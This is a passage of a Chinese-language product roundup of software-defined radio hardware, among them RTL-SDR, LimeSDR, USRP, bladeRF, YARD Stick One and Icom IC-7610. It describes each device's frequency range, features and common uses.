如果說HackRF One功能最全,那麼RTL-SDR是最實惠的。追隨者幾乎像邪教一樣,有很多論壇和站點可以幫助您快速監聽RTL-SDR軟體定義的廣播。RTL-SDR僅能接收而不能RTL-SDR是基於RTL2832U ADC晶元的軟體定義的無線電接收器。它還包含一個R820T2調諧器,一個1PPM TCXO(具有良好的穩定性)。)和一個用於天線埠的SMA連接器。
RTL-SDR BLOG V3 R820T2 RTL2832U 1PPM TCXO HF校準Tee SMA軟體定義無線電與偶極天線套件
RTL-SDR是完美的預算軟體無線電,適用於許多應用,例如通用無線電掃描,空中交通管制,公共安全,ADS-B飛機雷達,ACARS,中繼無線電,P25 / MotoTRBO數字語音,POCSAG,氣象氣球, APRS,NOAA APT /流星M2氣象衛星,射電天文學,DAB。
該RTL-SDR無線電套件包括天線和其他有用的外圍設備。根據您對軟體無線電的熟悉程度,您可能還需要獲取此信息豐富的RTL-SDR指南的副本。
4. Nooelec NESDR SMArt v4,帶有鋁制外殼
帶有鋁制外殼的Nooelec NESDR SMArt SDR
Nooelec NESDR SMArt是一種高級SDR,能夠接收25MHz至1.7GHz的RF信號。SDR無線電的設計使其在運行時幾乎不受相鄰USB兼容設備(如Raspberry Pi)的干擾。
該Nooelec Radio與上面的捆綁軟體相似,但是缺少上變頻器(以及較高的價格)。這種廉價的SDR鑽機的另一個優點是它包含具有0.5PPM穩定性的超低相位雜訊TCXO。
5. ADALM-Pluto SDR軟體定義無線電主動學習模塊PlutoSDR
模擬設備ADALM-Pluto SDR軟體定義的無線電主動學習模塊PlutoSDR
ADALM-Pluto SDR是沉重的打擊者,對於那些正在尋找能夠發送和接收無線電軟體的人們來說,這是一個不錯的選擇。ADAML-Pluto比此列表中的其他一些SDR較新,因此沒有足夠豐富的支持此廣播的生態系統。以下是ADALM-Pluto SDR的一些功能:
基於ADI公司的AD9363 –高度集成的RF敏捷收發器和Xilinx Zynq Z-7010 FPGA
攜帶型獨立式RF學習模塊具成本效益的實驗平台
從325 MHz到3.8 GHz的RF覆蓋范圍。高達20 MHz的瞬時帶寬。靈活的速率,12位ADC和DAC。一台發射機和一台接收機,半雙工或全雙工
MATLAB,Simulink支持。GNU Radio接收器和源塊。libiio,一種C,C ++,C#和Python API
帶有Micro-USB 2.0連接器的USB 2.0供電介面高質量塑料外殼
6. SDRPlay RSPo雙寬頻1kHz-2GHz SDR接收器
SDRPlay RSPo軟體定義無線電
SDRplay RSPo是一款出色的軟體定義無線電選項,適合那些正在尋找可在Windows環境下工作的無線電的用戶。SDRplay的RF頻率范圍為1kHz至2GHz。它還具有14位解析度。該模型具有三個獨立的天線輸入,每個輸入均可通過軟體選擇。SDRplay僅接收,但非常適合工業,科學和教育目的。使用可用的和記錄的API,軟體定義的無線電開發人員可以創建自己的解調器。說到好的文檔,SDRplay越來越受歡迎,因此也有越來越多的用戶提供支持。
SDRplay具有以下優點:
在兩個完全獨立的2MHz頻譜窗口上同時接收1kHz至2GHz之間的任意值
通過2根天線同時進行處理,可實現測向,分集和降噪應用
覆蓋從1kHz到VLF,LF,MW,HF,VHF,UHF和L頻段至2GHz的所有頻率,無間隙
一次接收,監視和記錄高達10MHz的頻譜(單調諧器模式)
用於同步目的的外部時鍾輸入和輸出,或連接到GPS參考時鍾
使用SDRuno校準的S表/ RF功率和SNR測量(包括數據記錄到.CSV文件的功能)
攜帶型監控ISM / IoT /遙測頻段<2GHz的理想選擇
7. Great Scott Ubertooth套裝
Great Scott Ubertooth
Great Scott Ubertooth One是流線型SDR,它是最小的封裝之一,可以接收和發送高達2.4GHz的RF信號。套件包包括收音機,機殼和天線。
該應用程序軟體直觀易用,並且本機具有出色的接收器靈敏度和發射功率。該微控制器基於ARM Cortex-M3,可實現全速USB 2.0。對於希望開發自定義Class 1設備的用戶來說,Ubertooth One是一個很好的開發工具。Ubertooth是完全開源的(包括硬體和軟體)。
8. Original LimeSDR
原始LimeSDR軟體無線電開發板帶寬61.44MHz板tzt-
對於那些只追求基本功能的人來說,原始的LimeSDR是一個非常受歡迎的選擇。LimeSDR軟體定義的無線電提供了100kHz至3.8GHz頻率范圍內的發送和接收功能。LimeSDR具有很寬的頻率范圍,可以發送和接收UMTS,LTE,GSM,LoRa,藍牙,Zigbee,RFID和數字廣播,僅舉幾例。
LimeSDR也很平易近人,有一個強大的開發人員社區和可以安裝的「應用程序」,這要歸功於在該通用軟體定義無線電上運行的Snappy Ubuntu Core。
9. LimeSDR mini
製造商網站上的說明
LimeSDR-USB和Mini_1
LimeSDR和LimeSDR Mini是同一系列的無線電軟體的成員。一個不能替代另一個。相反,它們是互補的。
簡而言之,LimeSDR Mini是原始LimeSDR的更小,更便宜的版本。但是,它仍然發揮了很大的作用-LimeSDR Mini在其核心上使用了與LMS7002M相同的無線電收發器作為其同級產品。Mini擁有兩個通道,而不是四個通道,並且根據普遍需求,還有SMA連接器而不是微型U.FL連接器,並具有英特爾的MAX 10 FPGA。
我們已經運送了成千上萬的LimeSDR Mini板,以及數千個更大的LimeSDR板。兩者都建立在相同的供應鏈,開發工具和社區上,從而使軟體定義的無線電比以往任何時候都更易於訪問。
10. USRP B205mini-i平台
USRP B205mini-i SDR平台
USRP B205mini-i SDR平台是一種超高性能SDR平台,能夠發送和接收高達6GHz的信號。
USRP B205mini-i具有1個發送通道和1個接收通道,頻率范圍為70MHz至6GHz。高達56MHz的瞬時帶寬允許寬頻運行許多不同的波形。對於外部同步,可以使用10MHz外部參考時鍾或1 PPS(每秒脈沖)參考來實現。
11. Ettus B200 SDR
Ettus-B200-SDR 軟體定義無線電
USRP B200提供了一個完全集成的單板通用軟體無線電外圍設備平台,具有70 MHz – 6 GHz的連續頻率覆蓋范圍。它專為低成本實驗而設計,結合了可提供高達56MHz實時帶寬的完全集成的直接轉換收發器,開放且可重新編程的Spartan6 FPGA以及快速便捷的匯流排供電的SuperSpeed USB 3.0連接。對UHD(USRP硬體驅動程序)軟體的全面支持使您可以立即開始使用GNU Radio進行開發,使用OpenBTS對自己的GSM基站進行原型製作,並將代碼從B200無縫過渡到性能更高的行業級USRP平台。
12. Ettus B210 SDR
USRP B210(僅限主板)
USRP B210提供了一個完全集成的單板通用軟體無線電外圍設備(USRP™)平台,具有70 MHz – 6 GHz的連續頻率覆蓋范圍。它專為低成本實驗而設計,結合了AD9361 RFIC直接轉換收發器,可提供高達56MHz的實時帶寬,開放且可重新編程的Spartan6 FPGA,快速的SuperSpeed USB 3.0連接以及便捷的匯流排電源。對USRP硬體驅動程序(UHD)軟體的全面支持使您可以立即開始使用GNU Radio進行開發,使用OpenBTS對自己的GSM基站進行原型設計,以及從USRP B210到高性能,行業就緒的USRP平台的無縫過渡代碼。
13. BladeRF X40軟體定義無線電
BladeRF X40軟體定義無線電
開箱即用,bladeRF可以從300MHz調節到3.8GHz,而無需額外的板卡。通過諸如GNURadio(實時圖像)之類的開源軟體,bladeRF可以立即投入使用。憑借其靈活的硬體和軟體,bladeRF可以配置為充當定製RF數據機,GSM和LTE微蜂窩,GPS接收器,ATSC發射器或藍牙/ WiFi組合客戶端,而無需任何擴展卡。所有的BladeRF主機軟體,固件和HDL是開源的,可在GitHub上獲得。
亮點:
全雙工40MSPS 12位正交采樣
出廠校準的VCTCXO在38.4 MHz的1 Hz范圍內調諧
可拆帽式RF屏蔽層可提高系統靈敏度和隔離度
靈活的時鍾架構,可實現任意采樣率
GPIO擴展埠
SPI快閃記憶體可實現無頭操作
使用XB-200轉接板擴展了頻率覆蓋范圍
典型的+ 6dBm TX功率
14.YARD Stick One SDR USB收發器
YARD Stick One SDR
YARD(另一個無線加密狗)Stick One是一款小型裸板SDR收發器,適用於1GHz以下的頻率。該單元具有一個集成的接收放大器和發射放大器,以及一個用於為天線埠附件供電的集成偏置器。
該特定的捆綁包包括915MHz SMA天線。如果您正在尋找一款能夠發送和接收流行的免許可證頻段的低成本低成本收發器。
15. Icom IC-7610 HF / 50MHz 100W收發器
Icom IC-7610 HF / 50MHz 100W收發器-每個人都想要的SDR
新型IC-7610對全球的DXers和競賽者來說,微弱的信號不再是挑戰。將QSO放入日誌或嘗試其他時間的區別在於接收者的能力。即使存在更強的相鄰信號,IC-7610中的高性能RMDR仍能夠挑選出最微弱的信號。IC-7610引入了雙射頻直接采樣接收器。這些接收器可達到100dB RMDR,可與其他頂級收發器相媲美。IC-7610還在7英寸彩色顯示器上配備了高速,高解析度,實時頻譜示波器。
輸出功率:100W(25W AM)
接收頻率:0.030-60.00MHz
接收器類型:直接采樣
射頻直接采樣系統
IC-7610採用RF直接采樣系統,其中RF信號直接轉換為數字數據,然後由FPGA(現場可編程門陣列)進行處理。此過程可減少在傳統超外差接收機中發現的各種混頻器級中自然發生的失真。
IC-7610中的RF直接采樣系統具有110 dB * RMDR的能力。這種性能使您能夠將弱信號從強相鄰信號的雜訊中拉出來。當所需的信號從堆積中出來時,您實際上可以聽到一個差異!
小叔來啦:
看完之後,你是不是在選擇SDR設備上有了更清晰的思路了呢?